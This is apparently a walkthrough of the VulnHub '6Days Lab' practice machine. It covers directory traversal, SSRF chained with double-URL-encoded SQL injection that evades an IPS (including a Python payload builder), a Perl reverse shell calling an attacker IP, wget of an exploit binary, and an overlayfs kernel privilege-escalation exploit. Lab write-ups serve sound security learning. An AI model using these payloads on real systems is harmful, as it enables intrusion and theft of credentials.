Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQ sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network”. If you understand the risks, please download!
- 6Days_Lab-v1.0.1.ova (Size: 682 MB)
- Download: https://goo.gl/fwuRJ1
- Download (Mirror): https://download.vulnhub.com/6daylab/6Days_Lab-v1.0.1.ova
- Download (Torrent): https://download.vulnhub.com/6daylab/6Days_Lab-v1.0.1.ova.torrent ( Magnet)
Information gathering
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 62:ac:77:11:79:9a:21:64:c2:88:c0:87:7d:19:34:05 (DSA)
| 2048 cb:24:63:a9:7c:bc:7b:e9:a8:2a:d1:9f:4d:6a:a0:07 (RSA)
|_ 256 13:e5:dd:7b:a5:f2:bf:41:71:dd:88:40:7f:5f:5d:7b (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Rashomon IPS - Main Page
8080/tcp filtered http-proxy
MAC Address: 00:0C:29:C1:0F:DC (VMware)
Entering a discount code only returns a message saying the code has expired.
Directory traversal
Viewing the page source shows that images are loaded through image.php with a src parameter.
File inclusion
The src parameter is passed straight to the file-loading code, so it can be pointed at arbitrary paths.
Account password configuration file
<?php
$servername = "localhost";
$username = "sellingstuff";
$password = "n0_\$\$_n0_g41ns";
$dbname = "fancydb";
/etc/passwd entries of interest
user:x:1000:1000:user,,,:/home/user:/bin/bash
andrea:x:1001:1001::/home/andrea:/bin/andrea
View apache default configuration information
The Apache default site file shows that the real website runs on port 8080 and accepts only local connections; the Rashomon IPS listening on port 80 forwards requests to it.
GET /image.php?src=../../../../etc/apache2/sites-available/default
Python
From the configuration and the information gathered so far, the site on port 8080 talks directly to the MySQL database and the promocode parameter of checkpromo.php is injectable. The IPS on port 80 can be bypassed by URL-encoding the injection twice: the request passes through two HTTP parsers (the outer request to image.php and the inner request that image.php makes to 127.0.0.1:8080 via its src parameter), so the payload is decoded once per hop and only the fully decoded form reaches checkpromo.php.
Generate the SQL payloads with Python:
- Run python3 to start the interpreter.
- from urllib.parse import quote imports quote, the URL-encoding function.
- quote(quote("SQL statement")) URL-encodes the statement twice.
For example, quote(quote("aaaa'union select version(),2#")) returns the payload that reads the database version:
'aaaa%2527union%2520select%2520version%2528%2529%252C2%2523'
payload:image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520version%2528%2529%252C2%2523
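The double-encoding step above, as an added example that is not part of the original writeup: a small builder for every payload used on this page, plus a decoder that shows what each hop of the SSRF chain sees. The host, port and parameter name are taken from the Apache config and requests above; the "filter" at the end is an assumed keyword check standing in for whatever the Rashomon IPS really does, used only to illustrate why the single-decoded string does not look like an injection.

```python
from urllib.parse import quote, unquote

# Constructed for this example: the internal site that image.php fetches on
# behalf of the client (host and port come from the Apache config on the page),
# the injectable parameter, and a prefix that is not a valid promo code.
INTERNAL_URL = "http://127.0.0.1:8080/checkpromo.php?promocode="
PREFIX = "aaaa"

# The injection tails used in the walkthrough, keyed by what they return.
SQL_TAILS = {
    "version": "'union select version(),2#",
    "database": "'union select database(),2#",
    "tables": ("'union select group_concat(table_name),2 from information_schema.tables "
               "where table_schema=database()#"),
    "columns": ("'union select group_concat(column_name),2 from information_schema.columns "
                "where table_schema=database() and table_name='users'#"),
    "creds": "'union select group_concat(username,'~~~~',password),2 from fancydb.users#",
}


def double_encode(text):
    """URL-encode twice: once for the outer request to image.php, once for the
    inner request image.php makes to checkpromo.php. quote() leaves '/' and the
    unreserved characters alone (on Python 3.7+ that includes '~', which is why
    the '~~~~' separator survives unchanged)."""
    return quote(quote(text))


def build_src(tail):
    """Value of image.php's src parameter for one injection tail."""
    return INTERNAL_URL + double_encode(PREFIX + tail)


def build_request(tail):
    """Request line for the outer hop, i.e. what reaches the IPS on port 80."""
    return "GET /image.php?src=" + build_src(tail)


def decode_stages(encoded):
    """Return (after_one_decode, after_two_decodes): the first is what the outer
    hop holds after parsing its query string, the second is the string that
    checkpromo.php finally interpolates into its SQL query."""
    once = unquote(encoded)
    return once, unquote(once)


def naive_signature_match(text):
    """Assumed keyword filter (not Rashomon's real logic): flags only a literally
    visible 'union select'."""
    return "union select" in text.lower()


def all_requests():
    """Every request line, in the order the walkthrough uses them."""
    return {name: build_request(tail) for name, tail in SQL_TAILS.items()}


if __name__ == "__main__":
    for name, line in all_requests().items():
        print(f"# {name}\n{line}")
    once, twice = decode_stages(double_encode(PREFIX + SQL_TAILS["version"]))
    print("after one decode :", once, "-> flagged:", naive_signature_match(once))
    print("after two decodes:", twice, "-> flagged:", naive_signature_match(twice))
```

Running the block prints the five request lines; the "version" line matches the payload shown above character for character, and the decode stages show that the once-decoded form still carries %27 and %20 where the quote and spaces will appear, so a filter that decodes only once never sees the injection.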
SSRF + SQL injection
Get the name of the current database:
GET /image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520database%2528%2529%252C2%2523
Get the table in the current database
payload:/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520group_concat%2528table_name%2529%252C2%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2523
Get the field name in the table
payload:/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520group_concat%2528column_name%2529%252C2%2520from%2520information_schema.columns%2520where%2520table_schema%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2523
Obtain the required account and password information
payload:/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520group_concat%2528username%252C%2527~~~~%2527%252Cpassword%2529%252C2%2520from%2520fancydb.users%2523
You have %andrea~~~~SayNoToPentests discount!
SSH
The query returns the password of the andrea account; port 22 is open, so try logging in over SSH with it.
After logging in, no command produces any output. Note that andrea's login shell in the passwd entry above is /bin/andrea rather than a normal shell.
Perl reverse shell
andrea@cypm:~$ perl -e 'use Socket;$i="192.168.243.133";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
$ python -c 'import pty;pty.spawn("/bin/bash");'
andrea@cypm:~$
Kernel privilege escalation
Search for a kernel exploit (the 37292.c compiled below is Exploit-DB 37292, the overlayfs local privilege escalation for Ubuntu kernels 3.13 to 3.19)
root@kali:~# gcc /root/37292.c -o exp
root@kali:~# python -m SimpleHTTPServer 443
andrea@cypm:/tmp$ wget http://192.168.243.133:443/exp
Reference links
https://www.cnblogs.com/sym945/p/12154220.html
https://blog.csdn.net/qq_43746825/article/details/86909612
https://blog.csdn.net/weixin_44740377/article/details/106097285
https://blog.csdn.net/Kevinhanser/article/details/87887051
https://www.vulnhub.com/entry/6days-lab-11,156/